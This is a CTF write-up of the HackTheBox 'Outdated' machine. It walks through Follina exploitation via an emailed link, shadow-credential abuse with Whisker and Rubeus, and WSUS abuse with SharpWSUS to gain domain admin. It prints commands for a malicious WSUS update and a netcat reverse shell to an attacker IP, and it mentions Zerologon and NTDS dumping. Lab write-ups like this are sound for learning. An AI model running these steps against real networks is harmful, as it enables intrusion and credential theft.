mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
337 lines
12 KiB
Markdown
337 lines
12 KiB
Markdown
|
# HackTheBox - Outdated
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```bash
|
||
|
Nmap scan report for 10.10.11.175
|
||
|
Host is up (0.42s latency).
|
||
|
Not shown: 65519 filtered ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
25/tcp open smtp hMailServer smtpd
|
||
|
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP,
|
||
|
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|
||
|
53/tcp open domain?
|
||
|
| fingerprint-strings:
|
||
|
| DNSVersionBindReqTCP:
|
||
|
| version
|
||
|
|_ bind
|
||
|
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 02:03:33Z)
|
||
|
135/tcp open msrpc Microsoft Windows RPC
|
||
|
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||
|
445/tcp open microsoft-ds?
|
||
|
464/tcp open kpasswd5?
|
||
|
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|
||
|
| ssl-cert: Subject:
|
||
|
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
|
||
|
| Issuer: commonName=outdated-DC-CA
|
||
|
| Public Key type: rsa
|
||
|
| Public Key bits: 2048
|
||
|
| Signature Algorithm: sha256WithRSAEncryption
|
||
|
| Not valid before: 2022-06-18T05:50:24
|
||
|
| Not valid after: 2024-06-18T06:00:24
|
||
|
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
|
||
|
|_SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|
||
|
|_ssl-date: 2022-08-14T02:06:34+00:00; +7h00m00s from scanner time.
|
||
|
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|
||
|
| ssl-cert: Subject:
|
||
|
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
|
||
|
| Issuer: commonName=outdated-DC-CA
|
||
|
| Public Key type: rsa
|
||
|
| Public Key bits: 2048
|
||
|
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||
|
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||
|
|_http-title: Not Found
|
||
|
8530/tcp open http Microsoft IIS httpd 10.0
|
||
|
| http-methods:
|
||
|
| Supported Methods: OPTIONS TRACE GET HEAD POST
|
||
|
|_ Potentially risky methods: TRACE
|
||
|
|_http-server-header: Microsoft-IIS/10.0
|
||
|
|_http-title: Site does not have a title.
|
||
|
8531/tcp open unknown
|
||
|
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|
||
|
49678/tcp open msrpc Microsoft Windows RPC
|
||
|
54116/tcp open msrpc Microsoft Windows RPC
|
||
|
54125/tcp open msrpc Microsoft Windows RPC
|
||
|
```
|
||
|
|
||
|
### PORT 139/445 (SMB)
|
||
|
Checking for null authentication on smb we can list shares
|
||
|
|
||
|
<img src="https://i.imgur.com/9O6XieM.png"/>
|
||
|
|
||
|
Checking the `Shares` directory , it has a pdf which we can transfer it on your machine with `get`
|
||
|
|
||
|
<img src="https://i.imgur.com/KecIMt0.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/8gmAtnW.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/HLjRrRD.png"/>
|
||
|
|
||
|
The pdf talks about a breach on serevers and mentions about emailing the web application links to `itsupport@outdated.htb` through smtp and talks about patching the recent vulnerabilities
|
||
|
|
||
|
Now we can test for these CVEs but here only two CVEs are of high score which means they are critical than the others which are `CVE-2022-30190` dubbed as `Follina` and `CVE-2022-29130` which is rce through LDAP
|
||
|
|
||
|
## Foothold
|
||
|
|
||
|
### PORT 25 (SMTP)
|
||
|
On connecting with smpt with `telnet`,we send an email to `itsupport@outdated.htb` with a link on which we'll get a hit
|
||
|
|
||
|
<img src="https://i.imgur.com/w19ohcV.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/uCkaR5P.png"/>
|
||
|
|
||
|
### Testing for CVE-2022-30190 (Follina)
|
||
|
|
||
|
I tried testing to Follina from john hammond's repository
|
||
|
|
||
|
https://github.com/JohnHammond/msdt-follina
|
||
|
|
||
|
Before running this we need to make a change with the `invoke-request` which is downloading `nc64.exe` from github, so we need to host it from our machine
|
||
|
|
||
|
<img src="https://i.imgur.com/E5HP6Qg.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/K49sX3z.png"/>
|
||
|
|
||
|
Now run the script with hosting the payload on port 80
|
||
|
|
||
|
<img src="https://i.imgur.com/KM0ECFY.png"/>
|
||
|
|
||
|
And send the url through email
|
||
|
|
||
|
<img src="https://i.imgur.com/MZXo0ME.png"/>
|
||
|
|
||
|
After gettting a shell, I tried listing usernames with `net user` also checking the groups in which `btables` is in but that user doesn't exist
|
||
|
|
||
|
<img src="https://i.imgur.com/MC7F7v5.png"/>
|
||
|
But checking it with `/domain` it does
|
||
|
|
||
|
<img src="https://i.imgur.com/0IXdetf.png"/>
|
||
|
|
||
|
Which shows that this user is in `ITStaff` group
|
||
|
|
||
|
<img src="https://i.imgur.com/RtF7wLx.png"/>
|
||
|
|
||
|
So probably we are in some container as the IP is different as well
|
||
|
|
||
|
<img src="https://i.imgur.com/3gWPjVY.png"/>
|
||
|
|
||
|
On running linpeas we can see wsus is vulnerable
|
||
|
|
||
|
<img src="https://i.imgur.com/jN6MzFy.png"/>
|
||
|
|
||
|
We can also see that there are some kerberos tickets which are in the proces
|
||
|
|
||
|
<img src="https://i.imgur.com/zC5NplY.png"/>
|
||
|
|
||
|
|
||
|
I tried using `sharpwsus` but couldn't proceed further as it wasn't able to inspect the wsus server
|
||
|
|
||
|
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
|
||
|
|
||
|
<img src="https://i.imgur.com/QvpqYSE.png"/>
|
||
|
|
||
|
So going back to AD enumeartion, I used `sharphound` to dump the data and transffered it through `nc`
|
||
|
|
||
|
<img src="https://i.imgur.com/vJaiKmG.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/HnVNmao.png"/>
|
||
|
|
||
|
Uploading the data on bloodhound
|
||
|
|
||
|
<img src="https://i.imgur.com/5OJzQEM.png"/>
|
||
|
|
||
|
From the built in quries it didn't showed a path to escalate for btables
|
||
|
|
||
|
<img src="https://i.imgur.com/UHh59Aq.png"/>
|
||
|
|
||
|
## Privilege Escalation (sflowers)
|
||
|
|
||
|
I wasted a lot of time here until I updated both bloodhound and neo4j to the latest version
|
||
|
|
||
|
https://linuxhint.com/install-neo4j-ubuntu/
|
||
|
|
||
|
Following this I added the repository for the neo4j 4.4 as the latest version of bloodhound needs that specific version also latest build of sharphound is also required
|
||
|
|
||
|
```
|
||
|
sudo curl -fsSL https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
|
||
|
sudo add-apt-repository "deb https://debian.neo4j.com stable 4.4"
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/dxxeGYU.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/6fAMoyK.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/6fAMoyK.png"/>
|
||
|
|
||
|
When updating neo4j make sure to set this value to true
|
||
|
|
||
|
<img src="https://i.imgur.com/1iKLGxD.png"/>
|
||
|
|
||
|
Running the updated version of sharphound
|
||
|
|
||
|
https://github.com/BloodHoundAD/SharpHound
|
||
|
|
||
|
|
||
|
<img src="https://i.imgur.com/Ci8YjAD.png"/>
|
||
|
|
||
|
Now after uploading the json files, we'll see a path to escalate from btables users
|
||
|
|
||
|
<img src="https://i.imgur.com/V62pvuo.png"/>
|
||
|
|
||
|
We can see the abuse info for `AddKeyCredentialLink` in which we can shadow credentials for `sflowers` user
|
||
|
|
||
|
<img src="https://i.imgur.com/rjduzZN.png"/>>
|
||
|
|
||
|
<img src="https://i.imgur.com/APmFVvT.png"/>
|
||
|
|
||
|
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
|
||
|
|
||
|
This article explains the abuse of shadow credentials with `Whisker`
|
||
|
|
||
|
https://github.com/eladshamir/Whisker
|
||
|
|
||
|
For building the exe I used Visual Studio
|
||
|
|
||
|
<img src="https://i.imgur.com/IaMbOqX.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/KFyhnaZ.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/KFyhnaZ.png"/>
|
||
|
|
||
|
|
||
|
We can run this command for generating a certificate for key credential, which on runnning will show us the command for rubeus for getting NTLM hash for slfowers through PKINIT which is a pre-authentication through certificate
|
||
|
|
||
|
```bash
|
||
|
.\Whisker.exe add /target:sflowers /domain:outdated.htb /dc:dc.outdated.htb
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/tRcDD0d.png"/>
|
||
|
|
||
|
And with this command we can get the NTLM hash for sflowers
|
||
|
|
||
|
```
|
||
|
Rubeus.exe asktgt /user:sflowers /certificate:"<generated certificate>/password:"<generatedd certificate password" /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/0I9qGV3.png"/>
|
||
|
|
||
|
Using pass the hash through `evil-winrm` we can login
|
||
|
|
||
|
<img src="https://i.imgur.com/6xWtvHt.png"/>
|
||
|
|
||
|
Looking at the groups we are in `WSUS Administrators` group
|
||
|
|
||
|
<img src="https://i.imgur.com/PpyrH1C.png"/>
|
||
|
|
||
|
We can try runnning sharpwsus again
|
||
|
|
||
|
<img src="https://i.imgur.com/foJ5dR1.png"/>
|
||
|
|
||
|
Now what wsus (Windows Service Update) exactly is, it's a solution for deploying windows updates for systems in a domain where the hosts don't have to reach out to internet to get the updates instead they can get updates internally
|
||
|
|
||
|
To abuse this we can create a malcious update with using `PsExec` as it uses the signed exe from microsoft, and psexec is from sysinternals it won't be flagged so we can execute anyhing using that
|
||
|
|
||
|
```powershell
|
||
|
|
||
|
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" net localgroup administrators sflowers /add\"" /title:"Updauwte"'
|
||
|
```
|
||
|
|
||
|
Here the reason why I used cmd to run execute the sharpwsus is command is that it doesn't run properly with powershell and needs to escapte quotes
|
||
|
|
||
|
<img src="https://i.imgur.com/a5XVRWp.png"/>
|
||
|
|
||
|
Approving the update
|
||
|
|
||
|
```
|
||
|
SharpWSUS.exe approve /updateid:d47b1ac0-b4f7-43ca-b21f-dfbcf0499697 /computername:dc.outdated.htb /groupname:"pleauswse"
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/7aOBlXs.png"/>
|
||
|
|
||
|
And then check the status if the update has been installed
|
||
|
|
||
|
<img src="https://i.imgur.com/s8aoAaK.png"/>
|
||
|
|
||
|
|
||
|
Having the update installed which will add sflowers into the local administrator group, we can verify it by checking in which groups slfowers belongs to now
|
||
|
|
||
|
|
||
|
<img src="https://i.imgur.com/lw53NhQ.png"/>
|
||
|
|
||
|
Being in administrator's group on domain controller we can dump the SAM and NTDS.dit hashes
|
||
|
|
||
|
|
||
|
<img src="https://i.imgur.com/yz1WNiv.png"/>
|
||
|
|
||
|
Grabbing administrator's hash from NTDS.dit to perform pass the hash
|
||
|
|
||
|
<img src="https://i.imgur.com/zhN3MeJ.png"/>
|
||
|
|
||
|
We can also use any of the exec scripts from impacket
|
||
|
|
||
|
<img src="https://i.imgur.com/K84KUUI.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/HXAc4gy.png"/>
|
||
|
|
||
|
Instead of adding the user in administrators group we could have gotten a reverse shell through netcat as well
|
||
|
|
||
|
```powershell
|
||
|
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe
|
||
|
/c \" C:\Users\sflowers\nc64.exe 10.10.14.52 2222 -e cmd.exe\"" /title:"Updauwte"'
|
||
|
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/xcD6VhM.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/8a0jNfM.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/wXwcU0A.png"/>
|
||
|
|
||
|
|
||
|
## Un-intedned
|
||
|
|
||
|
### Testing for CVE-2020-1472 (Zerologon)
|
||
|
|
||
|
Now this CVE is old, but it's pretty common in AD as the machine was patched with recent CVEs but it this machine maybe vulnerable to zerologon
|
||
|
|
||
|
Which we can test if the machine is vulnerable with a testing script for the CVE
|
||
|
|
||
|
https://github.com/SecuraBV/CVE-2020-1472
|
||
|
|
||
|
The script needs netbios name which is the machine account name, we can get it with `enum4-linux`
|
||
|
|
||
|
<img src="https://i.imgur.com/FUM2nP3.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/4XdVhGY.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/qt0M6fj.png"/>
|
||
|
|
||
|
Now that we know it's vulnerable we can exploit it with `-x`
|
||
|
|
||
|
<img src="https://i.imgur.com/XBOXSHC.png"/>
|
||
|
|
||
|
|
||
|
We can dump the NTDS.dit with the computer account which is `DC` with a blank password
|
||
|
|
||
|
<img src="https://i.imgur.com/sDXab57.png"/>
|
||
|
|
||
|
And can perform pass the hash to get a shell as Administrator
|
||
|
|
||
|
<img src="https://i.imgur.com/1tPzg74.png"/>
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
## References
|
||
|
|
||
|
- https://github.com/JohnHammond/msdt-follina
|
||
|
- https://github.com/rth0pper/zerologon
|
||
|
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
|
||
|
- https://linuxhint.com/install-neo4j-ubuntu/
|
||
|
- https://github.com/BloodHoundAD/SharpHound
|
||
|
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
|
||
|
- https://github.com/eladshamir/Whisker
|
||
|
- https://securityonline.info/sharpwsus-csharp-tool-for-lateral-movement-through-wsus/
|
||
|
- https://labs.nettitude.com/blog/introducing-sharpwsus/
|
||
|
|